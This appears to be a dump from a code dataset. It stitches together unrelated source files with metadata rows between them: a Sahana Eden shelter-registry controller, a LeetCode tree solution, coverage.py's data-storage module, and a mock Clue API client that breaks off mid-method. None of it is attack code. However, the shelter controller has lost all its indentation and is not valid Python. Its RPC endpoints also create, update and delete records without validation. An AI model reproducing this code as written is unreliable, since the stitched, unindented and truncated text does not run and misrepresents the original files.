| mit | -8,516,747,661,055,037,000 | 31.467033 | 95 | 0.605475 | false |
flavour/cert | controllers/cr.py | 3 | 13875 | # -*- coding: utf-8 -*-
"""
Shelter Registry - Controllers
"""
# @ToDo Search shelters by type, services, location, available space
# @ToDo Tie in assessments from RAT and requests from RMS.
# @ToDo Associate persons with shelters (via presence loc == shelter loc?)
module = request.controller
resourcename = request.function
if module not in deployment_settings.modules:
raise HTTP(404, body="Module disabled: %s" % module)
# Load Models
s3mgr.load("cr_shelter")
# Options Menu (available in all Functions' Views)
s3_menu(module)
# S3 framework functions
# -----------------------------------------------------------------------------
def index():
""" Module's Home Page """
module_name = deployment_settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# =============================================================================
def shelter_type():
"""
RESTful CRUD controller
List / add shelter types (e.g. NGO-operated, Government evacuation center,
School, Hospital -- see Agasti opt_camp_type.)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
# @ToDo: Shelters per type display is broken -- always returns none.
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# -----------------------------------------------------------------------------
def shelter_service():
"""
RESTful CRUD controller
List / add shelter services (e.g. medical, housing, food, ...)
"""
tabs = [(T("Basic Details"), None),
(s3.crud_strings["cr_shelter"].subtitle_list, "shelter")]
rheader = lambda r: response.s3.shelter_rheader(r,
tabs=tabs)
output = s3_rest_controller(module, resourcename,
rheader=rheader)
return output
# =============================================================================
def shelter():
""" RESTful CRUD controller
>>> resource="shelter"
>>> from applications.sahana.modules.s3_test import WSGI_Test
>>> test=WSGI_Test(db)
>>> "200 OK" in test.getPage("/sahana/%s/%s" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("List Shelters")
>>> "200 OK" in test.getPage("/sahana/%s/%s/create" % (module,resource)) #doctest: +SKIP
True
>>> test.assertHeader("Content-Type", "text/html") #doctest: +SKIP
>>> test.assertInBody("Add Shelter") #doctest: +SKIP
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=json" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/html")
>>> test.assertInBody("[")
>>> "200 OK" in test.getPage("/sahana/%s/%s?format=csv" % (module,resource))
True
>>> test.assertHeader("Content-Type", "text/csv")
"""
tablename = "cr_shelter"
table = db[tablename]
# Load Models to add tabs
if deployment_settings.has_module("inv"):
s3mgr.load("inv_inv_item")
elif deployment_settings.has_module("req"):
# (gets loaded by Inv if available)
s3mgr.load("req_req")
# Prepare the Presence table for use by Shelters
s3mgr.load("pr_presence")
field = db.pr_presence.shelter_id
field.requires = IS_NULL_OR(IS_ONE_OF(db, "cr_shelter.id",
"%(name)s",
sort=True))
field.represent = lambda id: \
(id and [db.cr_shelter[id].name] or ["None"])[0]
field.ondelete = "RESTRICT"
if deployment_settings.get_ui_camp():
HELP = T("The Camp this person is checking into.")
else:
HELP = T("The Shelter this person is checking into.")
ADD_SHELTER = response.s3.ADD_SHELTER
SHELTER_LABEL = response.s3.SHELTER_LABEL
field.comment = DIV(A(ADD_SHELTER,
_class="colorbox",
_href=URL(c="cr", f="shelter",
args="create",
vars=dict(format="popup")),
_target="top",
_title=ADD_SHELTER),
DIV( _class="tooltip",
_title="%s|%s" % (SHELTER_LABEL,
HELP)))
field.label = SHELTER_LABEL
field.readable = True
field.writable = True
# Make pr_presence.pe_id visible:
pe_id = db.pr_presence.pe_id
pe_id.readable = True
pe_id.writable = True
# Usually, the pe_id field is an invisible foreign key, therefore it
# has no default representation/requirements => need to add this here:
pe_id.label = T("Person/Group")
pe_id.represent = s3_pentity_represent
pe_id.requires = IS_ONE_OF(db, "pr_pentity.pe_id",
s3_pentity_represent,
filterby="instance_type",
orderby="instance_type",
filter_opts=("pr_person",
"pr_group"))
s3mgr.configure("pr_presence",
# presence not deletable in this view! (need to register a check-out
# for the same person instead):
deletable=False,
list_fields=["id",
"pe_id",
"datetime",
"presence_condition",
"proc_desc"
])
# Access from Shelters
s3mgr.model.add_component("pr_presence",
cr_shelter="shelter_id")
s3mgr.configure(tablename,
# Go to People check-in for this shelter after creation
create_next = URL(c="cr", f="shelter",
args=["[id]", "presence"]))
# Pre-processor
response.s3.prep = cr_shelter_prep
rheader = response.s3.shelter_rheader
output = s3_rest_controller(module, resourcename, rheader=rheader)
return output
# -----------------------------------------------------------------------------
def cr_shelter_prep(r):
"""
Pre-processor for the REST Controller
"""
if r.component and r.component.name == "presence":
r.resource.add_filter(db.pr_presence.closed == False)
if r.interactive:
if r.method != "read":
# Don't want to see in Create forms
# inc list_create (list_fields over-rides)
address_hide(r.table)
if r.component:
if r.component.name == "inv_item" or \
r.component.name == "recv" or \
r.component.name == "send":
# Filter out items which are already in this inventory
response.s3.inv_prep(r)
elif r.component.name == "human_resource":
# Filter out people which are already staff for this warehouse
s3_filter_staff(r)
# Cascade the organisation_id from the hospital to the staff
db.hrm_human_resource.organisation_id.default = r.record.organisation_id
db.hrm_human_resource.organisation_id.writable = False
elif r.component.name == "rat":
# Hide the Implied fields
db.assess_rat.location_id.writable = False
db.assess_rat.location_id.default = r.record.location_id
db.assess_rat.location_id.comment = ""
# Set defaults
if auth.is_logged_in():
query = (db.pr_person.uuid == session.auth.user.person_uuid) & \
(db.hrm_human_resource.person_id == db.pr_person.id)
staff_id = db(query).select(db.hrm_human_resource.id,
limitby=(0, 1)).first()
if staff_id:
db.assess_rat.staff_id.default = staff_id.id
elif r.component.name == "presence":
if deployment_settings.get_ui_camp():
REGISTER_LABEL = T("Register Person into this Camp")
EMPTY_LIST = T("No People currently registered in this camp")
else:
REGISTER_LABEL = T("Register Person into this Shelter")
EMPTY_LIST = T("No People currently registered in this shelter")
# Hide the Implied fields
db.pr_presence.location_id.writable = False
db.pr_presence.location_id.default = r.record.location_id
db.pr_presence.location_id.comment = ""
db.pr_presence.proc_desc.readable = db.pr_presence.proc_desc.writable = False
# AT: Add Person
db.pr_presence.pe_id.comment = \
DIV(s3_person_comment(T("Add Person"), REGISTER_LABEL),
DIV(A(s3.crud_strings.pr_group.label_create_button,
_class="colorbox",
_href=URL(c="pr", f="group", args="create",
vars=dict(format="popup")),
_target="top",
_title=s3.crud_strings.pr_group.label_create_button),
DIV(_class="tooltip",
_title="%s|%s" % (T("Create Group Entry"),
T("Create a group entry in the registry.")))
)
)
db.pr_presence.pe_id.widget = S3AutocompleteWidget("pr", "pentity")
# Set defaults
db.pr_presence.datetime.default = request.utcnow
db.pr_presence.observer.default = s3_logged_in_person()
cr_shelter_presence_opts = {
vita.CHECK_IN: vita.presence_conditions[vita.CHECK_IN],
vita.CHECK_OUT: vita.presence_conditions[vita.CHECK_OUT]}
db.pr_presence.presence_condition.requires = IS_IN_SET(
cr_shelter_presence_opts, zero=None)
db.pr_presence.presence_condition.default = vita.CHECK_IN
# Change the Labels
s3.crud_strings.pr_presence = Storage(
title_create = T("Register Person"),
title_display = T("Registration Details"),
title_list = T("Registered People"),
title_update = T("Edit Registration"),
                title_search = T("Search Registrations"),
subtitle_create = REGISTER_LABEL,
subtitle_list = T("Current Registrations"),
label_list_button = T("List Registrations"),
label_create_button = T("Register Person"),
msg_record_created = T("Registration added"),
msg_record_modified = T("Registration updated"),
msg_record_deleted = T("Registration entry deleted"),
msg_list_empty = EMPTY_LIST
)
elif r.component.name == "req":
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
response.s3.req_create_form_mods()
return True
# =============================================================================
def incoming():
""" Incoming Shipments """
s3mgr.load("inv_inv_item")
try:
return response.s3.inv_incoming()
except TypeError:
return None
# -----------------------------------------------------------------------------
def req_match():
""" Match Requests """
s3mgr.load("req_req")
try:
return response.s3.req_match()
except TypeError:
return None
# =============================================================================
# This code provides urls of the form:
# http://.../eden/cr/call/<service>/rpc/<method>/<id>
# e.g.:
# http://.../eden/cr/call/jsonrpc/rpc/list/2
# It is not currently in use but left in as an example, and because it may
# be used in future for interoperating with or transferring data from Agasti
# which uses xml-rpc. See:
# http://www.web2py.com/examples/default/tools#services
# http://groups.google.com/group/web2py/browse_thread/thread/53086d5f89ac3ae2
def call():
"Call an XMLRPC, JSONRPC or RSS service"
return service()
@service.jsonrpc
@service.xmlrpc
@service.amfrpc
def rpc(method, id=0):
if method == "list":
return db().select(db.cr_shelter.ALL).as_list()
if method == "read":
return db(db.cr_shelter.id == id).select().as_list()
if method == "delete":
status=db(db.cr_shelter.id == id).delete()
if status:
return "Success - record %d deleted!" % id
else:
return "Failed - no record %d!" % id
else:
return "Method not implemented!"
@service.xmlrpc
def create(name):
# Need to do validation manually!
id = db.cr_shelter.insert(name=name)
return id
@service.xmlrpc
def update(id, name):
# Need to do validation manually!
status = db(db.cr_shelter.id == id).update(name=name)
#@todo: audit!
if status:
return "Success - record %d updated!" % id
else:
return "Failed - no record %d!" % id
| mit | 2,831,012,067,847,777,000 | 38.756447 | 95 | 0.510486 | false |
lmmsoft/LeetCode | LeetCode-Algorithm/1123. Lowest Common Ancestor of Deepest Leaves/1123.py | 1 | 2318 | # Definition for a binary tree node.
from typing import Dict, List
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def lcaDeepestLeaves1(self, root: TreeNode) -> TreeNode:
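        # Strategy: record each node's parent and depth with a DFS, take all
        # nodes at the maximum depth, then walk their parent pointers upward in
        # lockstep until they converge on a single node, which is the answer.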
self.parent: Dict[TreeNode, TreeNode] = {}
self.deep_list: Dict[int, List[TreeNode]] = {}
def dfs(n: TreeNode, deep: int):
if deep in self.deep_list:
self.deep_list[deep].append(n)
else:
self.deep_list[deep] = [n]
if n.left:
self.parent[n.left] = n
dfs(n.left, deep + 1)
if n.right:
self.parent[n.right] = n
dfs(n.right, deep + 1)
dfs(root, 0)
max_deep: int = max(self.deep_list.keys())
leaves: list = self.deep_list[max_deep]
while True:
s = set()
for l in leaves:
s.add(l)
if len(s) == 1:
return list(s)[0]
else:
leaves = [self.parent[leaf] for leaf in leaves]
return None
# rank 11 superluminal
    # Similar idea, implemented with BFS instead of DFS plus a parent map
def lcaDeepestLeaves(self, root: TreeNode) -> TreeNode:
"""
:type root: TreeNode
:rtype: TreeNode
"""
parent = {}
queue = set([root])
while True:
next_queue = set()
for node in queue:
for child in (node.left, node.right):
if child:
parent[child] = node
next_queue.add(child)
if not next_queue:
break
queue = next_queue
        # At this point queue holds all the deepest leaves, because their next_queue was empty
while len(queue) > 1:
queue = set(parent[n] for n in queue)
for node in queue:
return node
if __name__ == '__main__':
n1 = TreeNode(1)
n2 = TreeNode(2)
n3 = TreeNode(3)
n4 = TreeNode(4)
n5 = TreeNode(5)
n1.left = n2
n1.right = n3
assert Solution().lcaDeepestLeaves(n1) == n1
n2.left = n4
assert Solution().lcaDeepestLeaves(n1) == n4
n2.right = n5
assert Solution().lcaDeepestLeaves(n1) == n2
| gpl-2.0 | -2,714,826,590,182,496,000 | 25.232558 | 63 | 0.490248 | false |
sdeepanshu02/microblog | flask/Lib/site-packages/coverage/data.py | 40 | 27599 | # Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://bitbucket.org/ned/coveragepy/src/default/NOTICE.txt
"""Coverage data for coverage.py."""
import glob
import itertools
import json
import optparse
import os
import os.path
import random
import re
import socket
from coverage import env
from coverage.backward import iitems, string_class
from coverage.debug import _TEST_NAME_FILE
from coverage.files import PathAliases
from coverage.misc import CoverageException, file_be_gone, isolate_module
os = isolate_module(os)
class CoverageData(object):
"""Manages collected coverage data, including file storage.
    This class is the publicly supported API to the data that coverage.py collects
during program execution. It includes information about what code was
executed. It does not include information from the analysis phase, to
determine what lines could have been executed, or what lines were not
executed.
.. note::
The file format is not documented or guaranteed. It will change in
the future, in possibly complicated ways. Do not read coverage.py
data files directly. Use this API to avoid disruption.
There are a number of kinds of data that can be collected:
* **lines**: the line numbers of source lines that were executed.
These are always available.
* **arcs**: pairs of source and destination line numbers for transitions
between source lines. These are only available if branch coverage was
used.
* **file tracer names**: the module names of the file tracer plugins that
handled each file in the data.
* **run information**: information about the program execution. This is
written during "coverage run", and then accumulated during "coverage
combine".
Lines, arcs, and file tracer names are stored for each source file. File
names in this API are case-sensitive, even on platforms with
case-insensitive file systems.
To read a coverage.py data file, use :meth:`read_file`, or
:meth:`read_fileobj` if you have an already-opened file. You can then
access the line, arc, or file tracer data with :meth:`lines`, :meth:`arcs`,
or :meth:`file_tracer`. Run information is available with
:meth:`run_infos`.
The :meth:`has_arcs` method indicates whether arc data is available. You
can get a list of the files in the data with :meth:`measured_files`.
A summary of the line data is available from :meth:`line_counts`. As with
most Python containers, you can determine if there is any data at all by
using this object as a boolean value.
Most data files will be created by coverage.py itself, but you can use
methods here to create data files if you like. The :meth:`add_lines`,
:meth:`add_arcs`, and :meth:`add_file_tracers` methods add data, in ways
that are convenient for coverage.py. The :meth:`add_run_info` method adds
key-value pairs to the run information.
To add a file without any measured data, use :meth:`touch_file`.
You write to a named file with :meth:`write_file`, or to an already opened
file with :meth:`write_fileobj`.
You can clear the data in memory with :meth:`erase`. Two data collections
can be combined by using :meth:`update` on one :class:`CoverageData`,
passing it the other.
"""
# The data file format is JSON, with these keys:
#
# * lines: a dict mapping file names to lists of line numbers
# executed::
#
# { "file1": [17,23,45], "file2": [1,2,3], ... }
#
# * arcs: a dict mapping file names to lists of line number pairs::
#
# { "file1": [[17,23], [17,25], [25,26]], ... }
#
# * file_tracers: a dict mapping file names to plugin names::
#
# { "file1": "django.coverage", ... }
#
# * runs: a list of dicts of information about the coverage.py runs
# contributing to the data::
#
# [ { "brief_sys": "CPython 2.7.10 Darwin" }, ... ]
#
# Only one of `lines` or `arcs` will be present: with branch coverage, data
# is stored as arcs. Without branch coverage, it is stored as lines. The
# line data is easily recovered from the arcs: it is all the first elements
# of the pairs that are greater than zero.
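    # Putting these together, a data file on disk is the go-away marker written
    # by `write_fileobj` followed immediately by the JSON document, e.g.
    # (hypothetical content):
    #
    #   !coverage.py: This is a private format, don't read it directly!{"lines": {"prog.py": [1, 2, 5]}}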
def __init__(self, debug=None):
"""Create a CoverageData.
`debug` is a `DebugControl` object for writing debug messages.
"""
self._debug = debug
# A map from canonical Python source file name to a dictionary in
# which there's an entry for each line number that has been
# executed:
#
# { 'filename1.py': [12, 47, 1001], ... }
#
self._lines = None
# A map from canonical Python source file name to a dictionary with an
# entry for each pair of line numbers forming an arc:
#
# { 'filename1.py': [(12,14), (47,48), ... ], ... }
#
self._arcs = None
# A map from canonical source file name to a plugin module name:
#
# { 'filename1.py': 'django.coverage', ... }
#
self._file_tracers = {}
# A list of dicts of information about the coverage.py runs.
self._runs = []
def __repr__(self):
return "<{klass} lines={lines} arcs={arcs} tracers={tracers} runs={runs}>".format(
klass=self.__class__.__name__,
lines="None" if self._lines is None else "{{{0}}}".format(len(self._lines)),
arcs="None" if self._arcs is None else "{{{0}}}".format(len(self._arcs)),
tracers="{{{0}}}".format(len(self._file_tracers)),
runs="[{0}]".format(len(self._runs)),
)
##
## Reading data
##
def has_arcs(self):
"""Does this data have arcs?
Arc data is only available if branch coverage was used during
collection.
Returns a boolean.
"""
return self._has_arcs()
def lines(self, filename):
"""Get the list of lines executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no lines executed, in which case an empty list is returned.
If the file was executed, returns a list of integers, the line numbers
executed in the file. The list is in no particular order.
"""
if self._arcs is not None:
arcs = self._arcs.get(filename)
if arcs is not None:
all_lines = itertools.chain.from_iterable(arcs)
return list(set(l for l in all_lines if l > 0))
elif self._lines is not None:
return self._lines.get(filename)
return None
def arcs(self, filename):
"""Get the list of arcs executed for a file.
If the file was not measured, returns None. A file might be measured,
and have no arcs executed, in which case an empty list is returned.
If the file was executed, returns a list of 2-tuples of integers. Each
pair is a starting line number and an ending line number for a
transition from one line to another. The list is in no particular
order.
Negative numbers have special meaning. If the starting line number is
-N, it represents an entry to the code object that starts at line N.
        If the ending line number is -N, it's an exit from the code object that
starts at line N.
"""
if self._arcs is not None:
if filename in self._arcs:
return self._arcs[filename]
return None
def file_tracer(self, filename):
"""Get the plugin name of the file tracer for a file.
Returns the name of the plugin that handles this file. If the file was
measured, but didn't use a plugin, then "" is returned. If the file
was not measured, then None is returned.
"""
# Because the vast majority of files involve no plugin, we don't store
# them explicitly in self._file_tracers. Check the measured data
# instead to see if it was a known file with no plugin.
if filename in (self._arcs or self._lines or {}):
return self._file_tracers.get(filename, "")
return None
def run_infos(self):
"""Return the list of dicts of run information.
For data collected during a single run, this will be a one-element
list. If data has been combined, there will be one element for each
original data file.
"""
return self._runs
def measured_files(self):
"""A list of all files that had been measured."""
return list(self._arcs or self._lines or {})
def line_counts(self, fullpath=False):
"""Return a dict summarizing the line coverage data.
Keys are based on the file names, and values are the number of executed
lines. If `fullpath` is true, then the keys are the full pathnames of
the files, otherwise they are the basenames of the files.
Returns a dict mapping file names to counts of lines.
"""
summ = {}
if fullpath:
filename_fn = lambda f: f
else:
filename_fn = os.path.basename
for filename in self.measured_files():
summ[filename_fn(filename)] = len(self.lines(filename))
return summ
def __nonzero__(self):
return bool(self._lines or self._arcs)
__bool__ = __nonzero__
def read_fileobj(self, file_obj):
"""Read the coverage data from the given file object.
Should only be used on an empty CoverageData object.
"""
data = self._read_raw_data(file_obj)
self._lines = self._arcs = None
if 'lines' in data:
self._lines = data['lines']
if 'arcs' in data:
self._arcs = dict(
(fname, [tuple(pair) for pair in arcs])
for fname, arcs in iitems(data['arcs'])
)
self._file_tracers = data.get('file_tracers', {})
self._runs = data.get('runs', [])
self._validate()
def read_file(self, filename):
"""Read the coverage data from `filename` into this object."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Reading data from %r" % (filename,))
try:
with self._open_for_reading(filename) as f:
self.read_fileobj(f)
except Exception as exc:
raise CoverageException(
"Couldn't read data from '%s': %s: %s" % (
filename, exc.__class__.__name__, exc,
)
)
_GO_AWAY = "!coverage.py: This is a private format, don't read it directly!"
@classmethod
def _open_for_reading(cls, filename):
"""Open a file appropriately for reading data."""
return open(filename, "r")
@classmethod
def _read_raw_data(cls, file_obj):
"""Read the raw data from a file object."""
go_away = file_obj.read(len(cls._GO_AWAY))
if go_away != cls._GO_AWAY:
raise CoverageException("Doesn't seem to be a coverage.py data file")
return json.load(file_obj)
@classmethod
def _read_raw_data_file(cls, filename):
"""Read the raw data from a file, for debugging."""
with cls._open_for_reading(filename) as f:
return cls._read_raw_data(f)
##
## Writing data
##
def add_lines(self, line_data):
"""Add measured line data.
`line_data` is a dictionary mapping file names to dictionaries::
{ filename: { lineno: None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding lines: %d files, %d lines total" % (
len(line_data), sum(len(lines) for lines in line_data.values())
))
if self._has_arcs():
raise CoverageException("Can't add lines to existing arc data")
if self._lines is None:
self._lines = {}
for filename, linenos in iitems(line_data):
if filename in self._lines:
new_linenos = set(self._lines[filename])
new_linenos.update(linenos)
linenos = new_linenos
self._lines[filename] = list(linenos)
self._validate()
def add_arcs(self, arc_data):
"""Add measured arc data.
`arc_data` is a dictionary mapping file names to dictionaries::
{ filename: { (l1,l2): None, ... }, ...}
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding arcs: %d files, %d arcs total" % (
len(arc_data), sum(len(arcs) for arcs in arc_data.values())
))
if self._has_lines():
raise CoverageException("Can't add arcs to existing line data")
if self._arcs is None:
self._arcs = {}
for filename, arcs in iitems(arc_data):
if filename in self._arcs:
new_arcs = set(self._arcs[filename])
new_arcs.update(arcs)
arcs = new_arcs
self._arcs[filename] = list(arcs)
self._validate()
def add_file_tracers(self, file_tracers):
"""Add per-file plugin information.
`file_tracers` is { filename: plugin_name, ... }
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding file tracers: %d files" % (len(file_tracers),))
existing_files = self._arcs or self._lines or {}
for filename, plugin_name in iitems(file_tracers):
if filename not in existing_files:
raise CoverageException(
"Can't add file tracer data for unmeasured file '%s'" % (filename,)
)
existing_plugin = self._file_tracers.get(filename)
if existing_plugin is not None and plugin_name != existing_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, existing_plugin, plugin_name,
)
)
self._file_tracers[filename] = plugin_name
self._validate()
def add_run_info(self, **kwargs):
"""Add information about the run.
Keywords are arbitrary, and are stored in the run dictionary. Values
must be JSON serializable. You may use this function more than once,
but repeated keywords overwrite each other.
"""
if self._debug and self._debug.should('dataop'):
self._debug.write("Adding run info: %r" % (kwargs,))
if not self._runs:
self._runs = [{}]
self._runs[0].update(kwargs)
self._validate()
def touch_file(self, filename):
"""Ensure that `filename` appears in the data, empty if needed."""
if self._debug and self._debug.should('dataop'):
self._debug.write("Touching %r" % (filename,))
if not self._has_arcs() and not self._has_lines():
raise CoverageException("Can't touch files in an empty CoverageData")
if self._has_arcs():
where = self._arcs
else:
where = self._lines
where.setdefault(filename, [])
self._validate()
def write_fileobj(self, file_obj):
"""Write the coverage data to `file_obj`."""
# Create the file data.
file_data = {}
if self._has_arcs():
file_data['arcs'] = self._arcs
if self._has_lines():
file_data['lines'] = self._lines
if self._file_tracers:
file_data['file_tracers'] = self._file_tracers
if self._runs:
file_data['runs'] = self._runs
# Write the data to the file.
file_obj.write(self._GO_AWAY)
json.dump(file_data, file_obj)
def write_file(self, filename):
"""Write the coverage data to `filename`."""
if self._debug and self._debug.should('dataio'):
self._debug.write("Writing data to %r" % (filename,))
with open(filename, 'w') as fdata:
self.write_fileobj(fdata)
def erase(self):
"""Erase the data in this object."""
self._lines = None
self._arcs = None
self._file_tracers = {}
self._runs = []
self._validate()
def update(self, other_data, aliases=None):
"""Update this data with data from another `CoverageData`.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
"""
if self._has_lines() and other_data._has_arcs():
raise CoverageException("Can't combine arc data with line data")
if self._has_arcs() and other_data._has_lines():
raise CoverageException("Can't combine line data with arc data")
aliases = aliases or PathAliases()
# _file_tracers: only have a string, so they have to agree.
# Have to do these first, so that our examination of self._arcs and
# self._lines won't be confused by data updated from other_data.
for filename in other_data.measured_files():
other_plugin = other_data.file_tracer(filename)
filename = aliases.map(filename)
this_plugin = self.file_tracer(filename)
if this_plugin is None:
if other_plugin:
self._file_tracers[filename] = other_plugin
elif this_plugin != other_plugin:
raise CoverageException(
"Conflicting file tracer name for '%s': %r vs %r" % (
filename, this_plugin, other_plugin,
)
)
# _runs: add the new runs to these runs.
self._runs.extend(other_data._runs)
# _lines: merge dicts.
if other_data._has_lines():
if self._lines is None:
self._lines = {}
for filename, file_lines in iitems(other_data._lines):
filename = aliases.map(filename)
if filename in self._lines:
lines = set(self._lines[filename])
lines.update(file_lines)
file_lines = list(lines)
self._lines[filename] = file_lines
# _arcs: merge dicts.
if other_data._has_arcs():
if self._arcs is None:
self._arcs = {}
for filename, file_arcs in iitems(other_data._arcs):
filename = aliases.map(filename)
if filename in self._arcs:
arcs = set(self._arcs[filename])
arcs.update(file_arcs)
file_arcs = list(arcs)
self._arcs[filename] = file_arcs
self._validate()
##
## Miscellaneous
##
def _validate(self):
"""If we are in paranoid mode, validate that everything is right."""
if env.TESTING:
self._validate_invariants()
def _validate_invariants(self):
"""Validate internal invariants."""
# Only one of _lines or _arcs should exist.
assert not(self._has_lines() and self._has_arcs()), (
"Shouldn't have both _lines and _arcs"
)
# _lines should be a dict of lists of ints.
if self._has_lines():
for fname, lines in iitems(self._lines):
assert isinstance(fname, string_class), "Key in _lines shouldn't be %r" % (fname,)
assert all(isinstance(x, int) for x in lines), (
"_lines[%r] shouldn't be %r" % (fname, lines)
)
# _arcs should be a dict of lists of pairs of ints.
if self._has_arcs():
for fname, arcs in iitems(self._arcs):
assert isinstance(fname, string_class), "Key in _arcs shouldn't be %r" % (fname,)
assert all(isinstance(x, int) and isinstance(y, int) for x, y in arcs), (
"_arcs[%r] shouldn't be %r" % (fname, arcs)
)
# _file_tracers should have only non-empty strings as values.
for fname, plugin in iitems(self._file_tracers):
assert isinstance(fname, string_class), (
"Key in _file_tracers shouldn't be %r" % (fname,)
)
assert plugin and isinstance(plugin, string_class), (
"_file_tracers[%r] shoudn't be %r" % (fname, plugin)
)
# _runs should be a list of dicts.
for val in self._runs:
assert isinstance(val, dict)
for key in val:
assert isinstance(key, string_class), "Key in _runs shouldn't be %r" % (key,)
def add_to_hash(self, filename, hasher):
"""Contribute `filename`'s data to the `hasher`.
`hasher` is a `coverage.misc.Hasher` instance to be updated with
the file's data. It should only get the results data, not the run
data.
"""
if self._has_arcs():
hasher.update(sorted(self.arcs(filename) or []))
else:
hasher.update(sorted(self.lines(filename) or []))
hasher.update(self.file_tracer(filename))
##
## Internal
##
def _has_lines(self):
"""Do we have data in self._lines?"""
return self._lines is not None
def _has_arcs(self):
"""Do we have data in self._arcs?"""
return self._arcs is not None
class CoverageDataFiles(object):
"""Manage the use of coverage data files."""
def __init__(self, basename=None, warn=None):
"""Create a CoverageDataFiles to manage data files.
`warn` is the warning function to use.
`basename` is the name of the file to use for storing data.
"""
self.warn = warn
# Construct the file name that will be used for data storage.
self.filename = os.path.abspath(basename or ".coverage")
def erase(self, parallel=False):
"""Erase the data from the file storage.
If `parallel` is true, then also deletes data files created from the
basename by parallel-mode.
"""
file_be_gone(self.filename)
if parallel:
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
pattern = os.path.join(os.path.abspath(data_dir), localdot)
for filename in glob.glob(pattern):
file_be_gone(filename)
def read(self, data):
"""Read the coverage data."""
if os.path.exists(self.filename):
data.read_file(self.filename)
def write(self, data, suffix=None):
"""Write the collected coverage data to a file.
`suffix` is a suffix to append to the base file name. This can be used
for multiple or parallel execution, so that many coverage data files
can exist simultaneously. A dot will be used to join the base name and
the suffix.
"""
filename = self.filename
if suffix is True:
# If data_suffix was a simple true value, then make a suffix with
# plenty of distinguishing information. We do this here in
            # `write()` at the last minute so that the pid will be correct even
# if the process forks.
extra = ""
if _TEST_NAME_FILE: # pragma: debugging
with open(_TEST_NAME_FILE) as f:
test_name = f.read()
extra = "." + test_name
suffix = "%s%s.%s.%06d" % (
socket.gethostname(), extra, os.getpid(),
random.randint(0, 999999)
)
if suffix:
filename += "." + suffix
data.write_file(filename)
def combine_parallel_data(self, data, aliases=None, data_paths=None):
"""Combine a number of data files together.
Treat `self.filename` as a file prefix, and combine the data from all
of the data files starting with that prefix plus a dot.
If `aliases` is provided, it's a `PathAliases` object that is used to
re-map paths to match the local machine's.
If `data_paths` is provided, it is a list of directories or files to
combine. Directories are searched for files that start with
`self.filename` plus dot as a prefix, and those files are combined.
If `data_paths` is not provided, then the directory portion of
`self.filename` is used as the directory to search for data files.
Every data file found and combined is then deleted from disk. If a file
cannot be read, a warning will be issued, and the file will not be
deleted.
"""
# Because of the os.path.abspath in the constructor, data_dir will
# never be an empty string.
data_dir, local = os.path.split(self.filename)
localdot = local + '.*'
data_paths = data_paths or [data_dir]
files_to_combine = []
for p in data_paths:
if os.path.isfile(p):
files_to_combine.append(os.path.abspath(p))
elif os.path.isdir(p):
pattern = os.path.join(os.path.abspath(p), localdot)
files_to_combine.extend(glob.glob(pattern))
else:
raise CoverageException("Couldn't combine from non-existent path '%s'" % (p,))
for f in files_to_combine:
new_data = CoverageData()
try:
new_data.read_file(f)
except CoverageException as exc:
if self.warn:
# The CoverageException has the file name in it, so just
# use the message as the warning.
self.warn(str(exc))
else:
data.update(new_data, aliases=aliases)
file_be_gone(f)
def canonicalize_json_data(data):
"""Canonicalize our JSON data so it can be compared."""
for fname, lines in iitems(data.get('lines', {})):
data['lines'][fname] = sorted(lines)
for fname, arcs in iitems(data.get('arcs', {})):
data['arcs'][fname] = sorted(arcs)
def pretty_data(data):
"""Format data as JSON, but as nicely as possible.
Returns a string.
"""
# Start with a basic JSON dump.
out = json.dumps(data, indent=4, sort_keys=True)
# But pairs of numbers shouldn't be split across lines...
out = re.sub(r"\[\s+(-?\d+),\s+(-?\d+)\s+]", r"[\1, \2]", out)
# Trailing spaces mess with tests, get rid of them.
out = re.sub(r"(?m)\s+$", "", out)
return out
def debug_main(args):
"""Dump the raw data from data files.
Run this as::
$ python -m coverage.data [FILE]
"""
parser = optparse.OptionParser()
parser.add_option(
"-c", "--canonical", action="store_true",
help="Sort data into a canonical order",
)
options, args = parser.parse_args(args)
for filename in (args or [".coverage"]):
print("--- {0} ------------------------------".format(filename))
data = CoverageData._read_raw_data_file(filename)
if options.canonical:
canonicalize_json_data(data)
print(pretty_data(data))
if __name__ == '__main__':
import sys
debug_main(sys.argv[1:])
| bsd-3-clause | 2,881,497,314,506,380,000 | 34.936198 | 98 | 0.578717 | false |
cmap/cmapPy | cmapPy/clue_api_client/mock_clue_api_client.py | 1 | 1622 | import logging
import cmapPy.clue_api_client.setup_logger as setup_logger
import cmapPy.clue_api_client.clue_api_client as clue_api_client
__authors__ = "David L. Lahr"
__email__ = "[email protected]"
logger = logging.getLogger(setup_logger.LOGGER_NAME)
class MockClueApiClient(clue_api_client.ClueApiClient):
def __init__(self, base_url=None, user_key=None, default_return_values=None, filter_query_result=None,
count_query_result=None, post_result=None, delete_result=None, put_result=None):
super(MockClueApiClient, self).__init__(base_url=base_url, user_key=user_key)
self.default_return_values = default_return_values if default_return_values else []
self.filter_query_result = filter_query_result if filter_query_result else self.default_return_values
self.count_query_result = count_query_result if count_query_result else self.default_return_values
self.post_result = post_result if post_result else self.default_return_values
self.delete_result = delete_result if delete_result else self.default_return_values
self.put_result = put_result if put_result else self.default_return_values
def run_filter_query(self, resource_name, filter_clause):
return self.filter_query_result
def run_count_query(self, resource_name, where_clause):
return self.count_query_result
def run_post(self, resource_name, data):
return self.post_result
def run_delete(self, resource_name, id):
